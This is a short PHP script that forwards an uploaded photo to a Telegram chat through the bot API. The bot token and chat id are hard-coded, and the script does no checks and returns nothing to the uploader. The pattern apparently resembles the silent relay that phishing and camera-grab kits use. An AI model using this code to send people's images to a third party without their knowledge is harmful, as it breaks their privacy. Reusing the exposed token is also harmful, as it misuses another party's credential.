<?php
$token = "8334743512:AAGEnZwkI9LYgmOdBm6wKeYFu9ffF4LXxwg";
$chatId = "8004961958";
$url = "https://api.telegram.org/bot$token/sendPhoto";
$formData = [
  'chat_id' => $chatId,
  'photo' => new CURLFile($_FILES['photo']['tmp_name'], $_FILES['photo']['type'], $_FILES['photo']['name'])
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $formData);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);
?>